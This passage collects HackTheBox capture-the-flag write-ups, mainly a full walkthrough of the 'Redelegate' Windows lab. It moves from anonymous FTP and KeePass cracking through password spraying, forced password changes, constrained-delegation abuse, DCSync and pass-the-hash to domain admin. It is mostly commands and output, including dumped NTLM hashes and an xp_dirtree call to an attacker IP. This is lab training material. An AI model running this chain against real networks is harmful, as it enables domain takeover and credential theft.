SMB         dc01.vintage.htb 445    dc01             FS01$:1108:aad3b435b51404eeaad3b435b51404ee:44a59c02ec44a90366ad1d0f8a781274:::
SMB         dc01.vintage.htb 445    dc01             [+] Dumped 17 NTDS hashes to /root/.nxc/logs/ntds/dc01_dc01.vintage.htb_2026-04-07_014821.ntds of which 14 were added to the database
SMB         dc01.vintage.htb 445    dc01             [*] To extract only enabled accounts from the output file, run the following command: 
SMB         dc01.vintage.htb 445    dc01             [*] grep -iv disabled /root/.nxc/logs/ntds/dc01_dc01.vintage.htb_2026-04-07_014821.ntds | cut -d ':' -f1

And we can just logon with Kerberos key and go take the Administrator file access.

PS: Administrator logon is turned-off in this machine due to:

Hardened
AMSI protection

┌──(kali㉿kali)-[~]
└─$ sudo impacket-getTGT vintage.htb/L.Bianchi_adm -hashes :6b751449807e0d73065b0423b64687f0 -dc-ip 10.129.231.205
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in L.Bianchi_adm.ccache
                                                                                                                                                                                                   
┌──(kali㉿kali)-[~]
└─$ export KRB5CCNAME=L.Bianchi_adm.ccache                                  
                                                                                                                                                                                                   
┌──(kali㉿kali)-[~]
└─$ sudo evil-winrm -i DC01.vintage.htb -r vintage.htb                                                            
                                        
Evil-WinRM shell v3.9
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\L.Bianchi_adm\Documents> whoami
vintage\l.bianchi_adm
*Evil-WinRM* PS C:\Users\L.Bianchi_adm\Documents> cd C:\users\administrator\desktop
*Evil-WinRM* PS C:\users\administrator\desktop> dir


    Directory: C:\users\administrator\desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---          4/7/2026   5:26 AM             34 root.txt


*Evil-WinRM* PS C:\users\administrator\desktop>

That’s it!!

labs.hackthebox.com/achievement/machine/2489228/637

Until next time and Happy Hacking!

HTB Redelegate - Windows (Hard)

Sulaiman — Mon, 27 Apr 2026 13:49:43 GMT

From HTB: -

Let’s begin!

Network Enumeration and Port Discovery

┌──(byt3n33dl3㉿kali)-[~]
└─$ ping -c2 10.129.194.125
PING 10.129.194.125 (10.129.194.125) 56(84) bytes of data.
64 bytes from 10.129.194.125: icmp_seq=1 ttl=127 time=112 ms
64 bytes from 10.129.194.125: icmp_seq=2 ttl=127 time=113 ms

--- 10.129.194.125 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 111.710/112.336/112.962/0.626 ms

Continue with NMAP Scanning:

┌──(byt3n33dl3㉿kali)-[~]
└─$ sudo nmap -Pn -p- --min-rate 8000 10.129.194.125 -oA nmap/nmap
Starting Nmap 7.98 ( https://nmap.org ) at
Nmap scan report for 10.129.194.125
Host is up (0.11s latency).
Not shown: 65504 closed tcp ports (reset)
PORT      STATE SERVICE
21/tcp    open  ftp
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
1433/tcp  open  ms-sql-s
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
3389/tcp  open  ms-wbt-server
5985/tcp  open  wsman
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49669/tcp open  unknown
49932/tcp open  unknown
56913/tcp open  unknown
60766/tcp open  unknown
60767/tcp open  unknown
62711/tcp open  unknown
62715/tcp open  unknown
62727/tcp open  unknown
62735/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in seconds

┌──(byt3n33dl3㉿kali)-[~]
└─$ sudo nmap -Pn -p21,53,80,88,135,139,389,445,464,593,636,1433,3268-3269,3389,5985,9389 -sC -sV 10.129.194.125 -oA nmap/nmap-ports                                                                                                        
Starting Nmap 7.98 ( https://nmap.org ) at 
Nmap scan report for DC (10.129.194.125)
Host is up (0.11s latency).

PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 10-20-24  01:11AM                  434 CyberAudit.txt
| 10-20-24  05:14AM                 2622 Shared.kdbx
|_10-20-24  01:26AM                  580 TrainingAgenda.txt
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-04-04 05:44:00Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: redelegate.vl, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2026-04-04T05:40:50
|_Not valid after:  2056-04-04T05:40:50
| ms-sql-ntlm-info: 
|   10.129.194.125:1433: 
|     Target_Name: REDELEGATE
|     NetBIOS_Domain_Name: REDELEGATE
|     NetBIOS_Computer_Name: DC
|     DNS_Domain_Name: redelegate.vl
|     DNS_Computer_Name: dc.redelegate.vl
|     DNS_Tree_Name: redelegate.vl
|_    Product_Version: 10.0.20348
| ms-sql-info: 
|   10.129.194.125:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
|_ssl-date: 2026-04-04T05:44:18+00:00; +12m56s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: redelegate.vl, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=dc.redelegate.vl
| Not valid before: 2026-04-03T05:38:09
|_Not valid after:  2026-10-03T05:38:09
|_ssl-date: 2026-04-04T05:44:18+00:00; +12m56s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: REDELEGATE
|   NetBIOS_Domain_Name: REDELEGATE
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: redelegate.vl
|   DNS_Computer_Name: dc.redelegate.vl
|   DNS_Tree_Name: redelegate.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2026-04-04T05:44:08+00:00
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2026-04-04T05:44:09
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
|_clock-skew: mean: 12m55s, deviation: 0s, median: 12m55s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in seconds

From the NMAP Scans we know that:

FTP is Anonymous ACCESS
MSSQL is going to be invloved

And we got domain of

dc.redelegate.vl DC redelegate.vl

So make it local.

The web would be second pririty.

FTP Anonymous Access

Based on NMAP there’s only 3 file, one of them is KDBX so I’ll crack it with my own tool:

sudo wget -m --no-passive ftp://anonymous:anonymous@dc

┌──(byt3n33dl3㉿kali)-[~]
└─$ sudo wget -m --no-passive ftp://anonymous:anonymous@dc
--2026-04-04 01:32:21--  ftp://anonymous:*password*@dc/
           => ‘dc/.listing’
Resolving dc (dc)... 10.129.194.125
. . .[SNIP]. . .

FINISHED --2026-04-04 01:32:24--
Total wall clock time: 2.3s
Downloaded: 4 files, 3.9K in 0.001s (3.11 MB/s)

And we got:

┌──(byt3n33dl3㉿kali)-[~]
└─$ tree .                                                                                                                                                                                                                                  
.
└── dc
    ├── CyberAudit.txt
    ├── Shared.kdbx
    └── TrainingAgenda.txt

Upon the .TXT file we got a hint that we will get a password based on seasons:

┌──(byt3n33dl3㉿kali)-[~]
└─$ cat dc/CyberAudit.txt                                                                                                                                                                                                                   
OCTOBER 2024 AUDIT FINDINGS

. . .[SNIP]. . .


Friday 18th October | 11.30 - 13.30 - 7 attendees
"Weak Passwords" - Why "SeasonYear!" is not a good password 


Friday 25th October | 9.30 - 12.30 - 29 attendees
"What now?" - Consequences of a cyber attack and how to mitigate them

This machine is made in 2025 so then I create this wordlists:

┌──(byt3n33dl3㉿kali)-[~]
└─$ cat pw.lst 
SeasonYear!
Summer2024!
Winter2024!
Fall2024!
Spring2024!
Autumn2024!
Summer2025!
Winter2025!
Fall2025!
Spring2025!
Autumn2025!

With that let’s try to crack the KeePass, in this lab here’s I’ll just use thc-jennifer

github.com/byt3n33dl3/thc-jennifer

┌──(byt3n33dl3㉿kali)-[~]
└─$ jennifer www/dc/Shared.kdbx pw.lst 
  ____  _____  _____  _____  ___  _____  _____  _____ 
  \_  \/   __\/  _  \/  _  \/___\/   __\/   __\/  _  \
---|  ||   __||  |  ||  |  ||   ||   __||   __||  _  <
\_____/\_____/\__|__/\__|__/\___/\__/   \_____/\__|\__\

  thc-Jennifer v2.1 || <@byt3n33dl3>

[*] kdbx v3  kdf=AES-KDF  rounds=600000
[*] wordlist=pw.lst  candidates=11  threads=4

[~] 9/11 (81.8%) | 540/min | ETA 0s
[+] cracked: Fall2024!

Not even a second!

KeePass Discovery

┌──(byt3n33dl3㉿kali)-[~]
└─$ sudo kpcli --kdb www/dc/Shared.kdbx 
Provide the master password: *************************

KeePass CLI (kpcli) v3.8.1 is ready for operation.
Type 'help' for a description of available commands.
Type 'help ' for details on individual commands.

kpcli:/> ls
=== Groups ===
Shared/
kpcli:/> cd Shared/
kpcli:/Shared> ls
=== Groups ===
Finance/
HelpDesk/
IT/
kpcli:/Shared> cd Finance/
kpcli:/Shared/Finance> ls
=== Entries ===
0. Payrol App                                                             
1. Timesheet Manager                                                      
kpcli:/Shared/Finance> show 0

Title: Payrol App
Uname: Payroll
 Pass: cVkqz4bCM7kJRSNlgx2G
. . .[SNIP]. . .

Title: FS01 Admin
Uname: Administrator
 Pass: Spdv41gg4BlBgSYIW1gF
  URL: 
Notes: 

kpcli:/Shared/IT> show 2

Title: SQL Guest Access
Uname: SQLGuest
 Pass: zDPBpaF4FywlqIv11vii
  URL: 
Notes:

In the KeePass we manage to discover many potential password and usernames.

Password And Protocol Spraying

I don’t usually create this path but due to taking long time of usernames and password brute-force, we just finally found one pairs and only works on MSSQL:

┌──(byt3n33dl3㉿kali)-[~]
└─$ sudo netexec mssql dc.redelegate.vl -u users.txt -p passwd.txt --local-auth --continue-on-success | grep "[+]"                                                                                                                          
MSSQL                    10.129.194.125  1433   DC               [+] DC\SQLGuest:zDPBpaF4FywlqIv11vii 

┌──(byt3n33dl3㉿kali)-[~]
└─$ sudo netexec mssql dc.redelegate.vl -u SQLGuest -p zDPBpaF4FywlqIv11vii --local-auth
MSSQL       10.129.194.125  1433   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:redelegate.vl) (EncryptionReq:False)
MSSQL       10.129.194.125  1433   DC               [+] DC\SQLGuest:zDPBpaF4FywlqIv11vii

PS: After some enumeration, the MSSQL would only best leading to RID identification, and giving us a valid local users.

SQL (SQLGuest  guest@master)> enum_links
SRV_NAME                     SRV_PROVIDERNAME   SRV_PRODUCT   SRV_DATASOURCE               SRV_PROVIDERSTRING   SRV_LOCATION   SRV_CAT   
--------------------------   ----------------   -----------   --------------------------   ------------------   ------------   -------   
WIN-Q13O908QBPG\SQLEXPRESS   SQLNCLI            SQL Server    WIN-Q13O908QBPG\SQLEXPRESS   NULL                 NULL           NULL      
. . .[SNIP]. . .
SQL (SQLGuest  guest@master)> enum_logins
name       type_desc   is_disabled   sysadmin   securityadmin   serveradmin   setupadmin   processadmin   diskadmin   dbcreator   bulkadmin   
--------   ---------   -----------   --------   -------------   -----------   ----------   ------------   ---------   ---------   ---------   
sa         SQL_LOGIN             1          1               0             0            0              0           0           0           0   
SQLGuest   SQL_LOGIN             0          0               0             0            0              0           0           0           0   
SQL (SQLGuest  guest@master)> enum_users
UserName             RoleName   LoginName   DefDBName   DefSchemaName       UserID     SID   
------------------   --------   ---------   ---------   -------------   ----------   -----   
dbo                  db_owner   sa          master      dbo             b'1         '   b'01'   
guest                public     NULL        NULL        guest           b'2         '   b'00'   
INFORMATION_SCHEMA   public     NULL        NULL        NULL            b'3         '    NULL   
sys                  public     NULL        NULL        NULL            b'4         '    NULL   
SQL (SQLGuest  guest@master)> xp_dirtree \\10.10.14.20\error
. . .[SNIP]. . .

I’ve tried NetNTLM, etc you named but none of them are crack or leading to something else:

So yeah, RID identification it is.

┌──(byt3n33dl3㉿kali)-[~]
└─$ sudo netexec mssql dc.redelegate.vl -u SQLGuest -p zDPBpaF4FywlqIv11vii --rid-brute --local-auth
MSSQL       10.129.194.125  1433   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:redelegate.vl) (EncryptionReq:False)
MSSQL       10.129.194.125  1433   DC               [+] DC\SQLGuest:zDPBpaF4FywlqIv11vii 
MSSQL       10.129.194.125  1433   DC               498: REDELEGATE\Enterprise Read-only Domain Controllers
MSSQL       10.129.194.125  1433   DC               500: WIN-Q13O908QBPG\Administrator
MSSQL       10.129.194.125  1433   DC               501: REDELEGATE\Guest
MSSQL       10.129.194.125  1433   DC               502: REDELEGATE\krbtgt
MSSQL       10.129.194.125  1433   DC               512: REDELEGATE\Domain Admins
MSSQL       10.129.194.125  1433   DC               513: REDELEGATE\Domain Users
MSSQL       10.129.194.125  1433   DC               514: REDELEGATE\Domain Guests
MSSQL       10.129.194.125  1433   DC               515: REDELEGATE\Domain Computers
MSSQL       10.129.194.125  1433   DC               516: REDELEGATE\Domain Controllers
MSSQL       10.129.194.125  1433   DC               517: REDELEGATE\Cert Publishers
MSSQL       10.129.194.125  1433   DC               518: REDELEGATE\Schema Admins
MSSQL       10.129.194.125  1433   DC               519: REDELEGATE\Enterprise Admins
MSSQL       10.129.194.125  1433   DC               520: REDELEGATE\Group Policy Creator Owners
MSSQL       10.129.194.125  1433   DC               521: REDELEGATE\Read-only Domain Controllers
MSSQL       10.129.194.125  1433   DC               522: REDELEGATE\Cloneable Domain Controllers
MSSQL       10.129.194.125  1433   DC               525: REDELEGATE\Protected Users
MSSQL       10.129.194.125  1433   DC               526: REDELEGATE\Key Admins
MSSQL       10.129.194.125  1433   DC               527: REDELEGATE\Enterprise Key Admins
MSSQL       10.129.194.125  1433   DC               553: REDELEGATE\RAS and IAS Servers
MSSQL       10.129.194.125  1433   DC               571: REDELEGATE\Allowed RODC Password Replication Group
MSSQL       10.129.194.125  1433   DC               572: REDELEGATE\Denied RODC Password Replication Group
MSSQL       10.129.194.125  1433   DC               1000: REDELEGATE\SQLServer2005SQLBrowserUser$WIN-Q13O908QBPG
MSSQL       10.129.194.125  1433   DC               1002: REDELEGATE\DC$
MSSQL       10.129.194.125  1433   DC               1103: REDELEGATE\FS01$
MSSQL       10.129.194.125  1433   DC               1104: REDELEGATE\Christine.Flanders
MSSQL       10.129.194.125  1433   DC               1105: REDELEGATE\Marie.Curie
MSSQL       10.129.194.125  1433   DC               1106: REDELEGATE\Helen.Frost
MSSQL       10.129.194.125  1433   DC               1107: REDELEGATE\Michael.Pontiac
MSSQL       10.129.194.125  1433   DC               1108: REDELEGATE\Mallory.Roberts
MSSQL       10.129.194.125  1433   DC               1109: REDELEGATE\James.Dinkleberg
MSSQL       10.129.194.125  1433   DC               1112: REDELEGATE\Helpdesk
MSSQL       10.129.194.125  1433   DC               1113: REDELEGATE\IT
MSSQL       10.129.194.125  1433   DC               1114: REDELEGATE\Finance
MSSQL       10.129.194.125  1433   DC               1115: REDELEGATE\DnsAdmins
MSSQL       10.129.194.125  1433   DC               1116: REDELEGATE\DnsUpdateProxy
MSSQL       10.129.194.125  1433   DC               1117: REDELEGATE\Ryan.Cooper
MSSQL       10.129.194.125  1433   DC               1119: REDELEGATE\sql_svc

So in finals, this is our users collections:

┌──(byt3n33dl3㉿kali)-[~]
└─$ sudo netexec mssql dc.redelegate.vl -u SQLGuest -p zDPBpaF4FywlqIv11vii --local-auth --rid-brute 2000 | awk -F'\\\\' '{print $2}' | awk '{print $1}' | grep -v '\$$' | sort -u

Administrator
Allowed
Cert
Christine.Flanders
Cloneable
Denied
DnsAdmins
DnsUpdateProxy
Domain
Enterprise
Finance
Group
Guest
Helen.Frost
Helpdesk
IT
James.Dinkleberg
Key
krbtgt
Mallory.Roberts
Marie.Curie
Michael.Pontiac
Protected
RAS
Read-only
Ryan.Cooper
Schema
SQLGuest:zDPBpaF4FywlqIv11vii
SQLServer2005SQLBrowserUser$WIN-Q13O908QBPG
sql_svc

And after re-force everything of usernames and password we got another match of:

┌──(byt3n33dl3㉿kali)-[~]
└─$ sudo netexec ldap dc.redelegate.vl -u users.txt -p passwd.txt --continue-on-success | grep "[+]"
LDAP                     10.129.194.125  389    DC               [+] redelegate.vl\Marie.Curie:Fall2024! 

┌──(byt3n33dl3㉿kali)-[~]
└─$ sudo netexec ldap dc.redelegate.vl -u Marie.Curie -p 'Fall2024!'
LDAP        10.129.194.125  389    DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:redelegate.vl) (signing:None) (channel binding:No TLS cert) 
LDAP        10.129.194.125  389    DC               [+] redelegate.vl\Marie.Curie:Fall2024!

user: Marie.Curie 
passwd: Fall2024!

And this one can be used in:

SMB
LDAP
and more

Active Directory BloodHound

I’ll just use NetExec as Collectors:

┌──(byt3n33dl3㉿kali)-[~]
└─$ sudo netexec ldap dc.redelegate.vl -u Marie.Curie -p 'Fall2024!' --bloodhound -c all --dns-server 10.129.194.125                                                                                                                        
LDAP        10.129.194.125  389    DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:redelegate.vl) (signing:None) (channel binding:No TLS cert) 
LDAP        10.129.194.125  389    DC               [+] redelegate.vl\Marie.Curie:Fall2024! 
LDAP        10.129.194.125  389    DC               Resolved collection methods: trusts, container, objectprops, rdp, dcom, session, psremote, localadmin, group, acl
LDAP        10.129.194.125  389    DC               Done in 0M 25S
LDAP        10.129.194.125  389    DC               Compressing output into /root/.nxc/logs/DC_10.129.194.125_2026-04-04_033811_bloodhound.zip

Let’s see the attack-paths

Dope, 6 OOB!

Wow, after some enumeration only one ChangePassword is usefull:

Yes, her!

Helen.Frost

Further access, Helen.Frost gain “GenericAll“ to FS01 Computer accounts, leading to potential Delegations, could be RBCD!

With-out being said, this is our path:

Object Password Changes

Let’s change password

┌──(byt3n33dl3㉿kali)-[~]
└─$ sudo netexec smb dc.redelegate.vl -u Marie.Curie -p 'Fall2024!' -M change-password -o USER=Helen.Frost NEWPASS=passw0rd1                                                                                                              
SMB         10.129.194.125  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:redelegate.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.194.125  445    DC               [+] redelegate.vl\Marie.Curie:Fall2024! 
CHANGE-P... 10.129.194.125  445    DC               [+] Successfully changed password for Helen.Frost

┌──(byt3n33dl3㉿kali)-[~]
└─$ sudo netexec smb dc.redelegate.vl -u helen.frost -p passw0rd1
SMB         10.129.194.125  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:redelegate.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.194.125  445    DC               [+] redelegate.vl\helen.frost:passw0rd1

Great, now we can hunt delegations path-ways to Admin!

Constrained Delegation

After further enumeration, we got MachineAccountQuota of 0, meaning we try another delegations, but RBCD wouldn’t be possible due to SeEnableDelegationPrivilege in not enabled.

┌──(byt3n33dl3㉿kali)-[~]
└─$ sudo netexec ldap dc.redelegate.vl -u helen.frost -p passw0rd1                                                                                                                                                                          
LDAP        10.129.194.125  389    DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:redelegate.vl) (signing:None) (channel binding:No TLS cert) 
LDAP        10.129.194.125  389    DC               [+] redelegate.vl\helen.frost:passw0rd1 

┌──(byt3n33dl3㉿kali)-[~]
└─$ sudo netexec ldap dc.redelegate.vl -u helen.frost -p passw0rd1 -M maq
LDAP        10.129.194.125  389    DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:redelegate.vl) (signing:None) (channel binding:No TLS cert) 
LDAP        10.129.194.125  389    DC               [+] redelegate.vl\helen.frost:passw0rd1 
MAQ         10.129.194.125  389    DC               [*] Getting the MachineAccountQuota
MAQ         10.129.194.125  389    DC               MachineAccountQuota: 0

Delegations

Unconstrained delegation: A machine can store a TGT for any user that connects, and use it to authenticate as that user. Configured by setting TRUSTED_FOR_DELEGATION in userAccountControl (requires SeEnableDelegationPrivilege).
Constrained delegation: A machine can impersonate a user, but only to specific services. Set TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION and define allowed targets in msDS-AllowedToDelegateTo (requires SeEnableDelegationPrivilege).
RBCD: The target machine decides who can delegate to it. Configured via msDS-AllowedToActOnBehalfOfOtherIdentity.

One again RBCD isn’t really relevant given the privilege here.

So this is our attack paths for Constrained delegations, but some objects needs to be edited:

┌──(byt3n33dl3㉿kali)-[~]
└─$ sudo faketime "$(ntpdate -q DC | cut -d ' ' -f 1,2)" impacket-getTGT redelegate.vl/helen.frost:passw0rd1                                                                                                                       
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in helen.frost.ccache

┌──(byt3n33dl3㉿kali)-[~]
└─$ export KRB5CCNAME=helen.frost.ccache

Then change the Computer (FS01) password:

┌──(byt3n33dl3㉿kali)-[~]
└─$ sudo faketime "$(ntpdate -q DC | cut -d ' ' -f 1,2)" bloodyAD -k --host dc.redelegate.vl set password 'FS01$' passw0rd2                                                                                                                 
[+] Password changed successfully!

Then we change the object to make “AllowedToDelegate“ enabled:

┌──(byt3n33dl3㉿kali)-[~]
└─$ sudo faketime "$(ntpdate -q DC | cut -d ' ' -f 1,2)" bloodyAD -d redelegate.vl -k --host dc.redelegate.vl add uac 'FS01$' -f TRUSTED_TO_AUTH_FOR_DELEGATION                                                                            
[-] ['TRUSTED_TO_AUTH_FOR_DELEGATION'] property flags added to FS01$'s userAccountControl

┌──(byt3n33dl3㉿kali)-[~]
└─$ sudo faketime "$(ntpdate -q DC | cut -d ' ' -f 1,2)" bloodyAD -d redelegate.vl -k --host dc.redelegate.vl set object 'FS01$' msDS-AllowedToDelegateTo -v cifs/dc.redelegate.vl
[+] FS01$'s msDS-AllowedToDelegateTo has been updated

Then we asked for the new Computers ticket

┌──(byt3n33dl3㉿kali)-[~]
└─$ sudo faketime "$(ntpdate -q DC | cut -d ' ' -f 1,2)" impacket-getTGT redelegate.vl/'FS01$:passw0rd2'
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in FS01$.ccache

┌──(byt3n33dl3㉿kali)-[~]
└─$ export KRB5CCNAME='FS01$.ccache'

And finally we can impersonate the DC with this ticket:

┌──(byt3n33dl3㉿kali)-[~]
└─$ klist                                                                                                                                                                                                                                   
Ticket cache: FILE:FS01$.ccache
Default principal: FS01$@REDELEGATE.VL

Valid starting       Expires              Service principal
04/04/2026 04:01:14  04/04/2026 14:01:14  krbtgt/REDELEGATE.VL@REDELEGATE.VL
        renew until 04/05/2026 04:01:13

┌──(byt3n33dl3㉿kali)-[~]
└─$ sudo faketime "$(ntpdate -q DC | cut -d ' ' -f 1,2)" impacket-getST -k -no-pass -spn cifs/dc.redelegate.vl -impersonate DC redelegate.vl/'FS01$'
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Impersonating DC
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in DC@cifs_dc.redelegate.vl@REDELEGATE.VL.ccache

┌──(byt3n33dl3㉿kali)-[~]
└─$ export KRB5CCNAME=DC@cifs_dc.redelegate.vl@REDELEGATE.VL.ccache

And we’re now the DC:

┌──(byt3n33dl3㉿kali)-[~]
└─$ klist                                                                                                                                                                                                                                   
Ticket cache: FILE:DC@cifs_dc.redelegate.vl@REDELEGATE.VL.ccache
Default principal: DC@redelegate.vl

Valid starting       Expires              Service principal
04/04/2026 04:02:02  04/04/2026 14:01:14  cifs/dc.redelegate.vl@REDELEGATE.VL
        renew until 04/05/2026 04:01:13

DCSync Attack and Logon as Administrator

With that we can just DCSycn:

┌──(byt3n33dl3㉿kali)-[~]
└─$ sudo faketime "$(ntpdate -q DC | cut -d ' ' -f 1,2)" netexec smb dc.redelegate.vl --use-kcache --ntds                                                                                                                                   
SMB         dc.redelegate.vl 445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:redelegate.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         dc.redelegate.vl 445    DC               [+] redelegate.vl\DC from ccache 
SMB         dc.redelegate.vl 445    DC               [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         dc.redelegate.vl 445    DC               Administrator:500:aad3b435b51404eeaad3b435b51404ee:ec17f7a2a4d96e177bfd101b94ffc0a7:::
SMB         dc.redelegate.vl 445    DC               Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         dc.redelegate.vl 445    DC               krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9288173d697316c718bb0f386046b102:::
SMB         dc.redelegate.vl 445    DC               Christine.Flanders:1104:aad3b435b51404eeaad3b435b51404ee:79581ad15ded4b9f3457dbfc35748ccf:::
SMB         dc.redelegate.vl 445    DC               Marie.Curie:1105:aad3b435b51404eeaad3b435b51404ee:a4bc00e2a5edcec18bd6266e6c47d455:::
SMB         dc.redelegate.vl 445    DC               Helen.Frost:1106:aad3b435b51404eeaad3b435b51404ee:798a21df6df33f3b2cf9eeb2adc99fef:::
SMB         dc.redelegate.vl 445    DC               Michael.Pontiac:1107:aad3b435b51404eeaad3b435b51404ee:f37d004253f5f7525ef9840b43e5dad2:::
SMB         dc.redelegate.vl 445    DC               Mallory.Roberts:1108:aad3b435b51404eeaad3b435b51404ee:980634f9aabfe13aec0111f64bda50c9:::
SMB         dc.redelegate.vl 445    DC               James.Dinkleberg:1109:aad3b435b51404eeaad3b435b51404ee:2716d39cc76e785bd445ca353714854d:::
SMB         dc.redelegate.vl 445    DC               Ryan.Cooper:1117:aad3b435b51404eeaad3b435b51404ee:062a12325a99a9da55f5070bf9c6fd2a:::
SMB         dc.redelegate.vl 445    DC               sql_svc:1119:aad3b435b51404eeaad3b435b51404ee:76a96946d9b465ec76a4b0b316785d6b:::
SMB         dc.redelegate.vl 445    DC               DC$:1002:aad3b435b51404eeaad3b435b51404ee:bfdff77d74764b0d4f940b7e9f684a61:::
SMB         dc.redelegate.vl 445    DC               FS01$:1103:aad3b435b51404eeaad3b435b51404ee:9f3091c0127448716fd54ba4fa078db4:::
SMB         dc.redelegate.vl 445    DC               [+] Dumped 13 NTDS hashes to /root/.nxc/logs/ntds/DC_dc.redelegate.vl_2026-04-04_040319.ntds of which 11 were added to the database
SMB         dc.redelegate.vl 445    DC               [*] To extract only enabled accounts from the output file, run the following command: 
SMB         dc.redelegate.vl 445    DC               [*] grep -iv disabled /root/.nxc/logs/ntds/DC_dc.redelegate.vl_2026-04-04_040319.ntds | cut -d ':' -f1

And logon as Administrator:

┌──(byt3n33dl3㉿kali)-[~]
└─$ wmiexec.py administrator@dc -hashes :ec17f7a2a4d96e177bfd101b94ffc0a7
Impacket v0.14.0.dev0+20260306.165346.8c155a5b - Copyright Fortra, LLC and its affiliated companies 

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
redelegate\administrator

C:\>hostname
dc

┌──(byt3n33dl3㉿kali)-[~]
└─$ wmiexec.py administrator@dc -k -no-pass
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
redelegate\administrator

That’s it!!

labs.hackthebox.com/achievement/machine/2489228/681

Until next time and Happy Hacking!

HTB Data - Linux (Easy)

Sulaiman — Mon, 27 Apr 2026 13:49:12 GMT

From HTB: -

Start with

Network Enumeration and Port Discovery

┌──(kali㉿kali)-[~]
└─$ ping -c2 10.129.234.47
PING 10.129.234.47 (10.129.234.47) 56(84) bytes of data.
64 bytes from 10.129.234.47: icmp_seq=1 ttl=63 time=401 ms
64 bytes from 10.129.234.47: icmp_seq=2 ttl=63 time=387 ms

--- 10.129.234.47 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1001ms
rtt min/avg/max/mdev = 386.603/393.855/401.108/7.252 ms

Continue with Nmap Scanning:

┌──(kali㉿kali)-[~]
└─$ sudo nmap -Pn -p- --min-rate 8000 10.129.234.47 -oA nmap/nmap                                               
Starting Nmap 7.98 ( https://nmap.org ) at 
Nmap scan report for 10.129.234.47
Host is up (0.39s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
3000/tcp open  ppp

Nmap done: 1 IP address (1 host up) scanned in seconds

